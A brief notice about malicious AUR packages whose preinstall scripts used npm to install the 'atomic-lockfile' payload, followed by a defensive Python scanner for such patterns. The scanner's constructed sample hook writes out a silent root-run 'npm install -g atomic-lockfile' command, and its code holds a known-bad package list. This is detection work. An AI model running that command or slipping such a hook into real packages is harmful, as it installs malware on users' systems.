
The initially affected packages were modified with preinstall scripts that use npm to install the atomic-lockfile package, a malicious payload.

Detailed analysis is here: https://ioctl.fail/preliminary-analysis-of-aur-malware/

You might be wondering how this happened. The truth is, the AUR package repository allows anyone to “adopt” a package and submit a change to the PKGBUILD/associated files if the package is marked as unmaintained. It turns out that automating the hunt for abandoned packages, and their adoption, is not uncommon.
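As an added example (not from the original post or the linked analysis), here is a small defensive scanner for the pattern described above: build files that shell out to npm to fetch packages at build or install time. It treats a fetch from a pacman `.install` hook as worse than one inside `build()`, because those hooks run as root on the user's machine, and it raises the severity further when the package name matches the one named in the post. The hook names, the scoring, and both sample inputs are assumptions constructed for the example.

```python
import re

# The npm package named in the post; everything else in this scanner is an assumption.
KNOWN_BAD_NPM_PACKAGES = {"atomic-lockfile"}

# pacman runs these .install hooks as root on the user's machine, so an npm
# fetch from one of them is riskier than a build-time fetch inside build().
INSTALL_HOOKS = {"pre_install", "post_install", "pre_upgrade",
                 "post_upgrade", "pre_remove", "post_remove"}

FUNC_START_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*\(\)\s*\{")
NPM_CALL_RE = re.compile(
    r"\b(?P<tool>npm|npx|yarn|pnpm)\s+(?P<verb>install|i|add|ci|exec)\b"
    r"(?P<rest>[^\n;&|<>]*)")


def _package_args(rest):
    """Keep only tokens that look like package names (drop flags and redirections)."""
    return [t for t in rest.split()
            if not t.startswith("-") and not any(c in t for c in "<>$")]


def scan_build_file(text):
    """Return findings for npm-style fetches in a PKGBUILD or .install file."""
    findings = []
    current_func = None  # bash function we are currently inside, if any
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = FUNC_START_RE.match(line)
        if m:
            current_func = m.group(1)
            continue
        if stripped == "}":
            current_func = None
            continue
        for call in NPM_CALL_RE.finditer(stripped):
            pkgs = _package_args(call.group("rest"))
            if any(p in KNOWN_BAD_NPM_PACKAGES for p in pkgs):
                severity = "high"      # known malicious payload name
            elif current_func in INSTALL_HOOKS:
                severity = "medium"    # network fetch from a root-run pacman hook
            else:
                severity = "low"       # build-time fetch; still worth a look
            findings.append({
                "line": lineno, "function": current_func, "tool": call.group("tool"),
                "packages": pkgs, "severity": severity, "text": stripped,
            })
    return findings


# Constructed sample of a tampered .install hook (not a real AUR file).
SAMPLE_INSTALL = """\
# constructed sample of a tampered .install hook
pre_install() {
    npm install -g atomic-lockfile >/dev/null 2>&1
}
post_install() {
    echo "done"
}
"""

# Constructed sample of a benign PKGBUILD fragment that runs npm at build time.
SAMPLE_PKGBUILD = """\
# constructed sample of a benign PKGBUILD fragment
pkgname=example-app
build() {
    cd "$srcdir/$pkgname"
    npm ci --offline
}
"""

if __name__ == "__main__":
    for name, text in (("sample.install", SAMPLE_INSTALL), ("PKGBUILD", SAMPLE_PKGBUILD)):
        for f in scan_build_file(text):
            print(f"{name}:{f['line']} [{f['severity']}] in {f['function']}(): {f['text']}")
```

Run against a directory of cloned AUR packages, the `high` hits are the ones to treat as confirmed compromise, while `medium` hits (any npm fetch from a pacman hook) deserve a manual read even when no known-bad name appears, since the package name in a future campaign will be different.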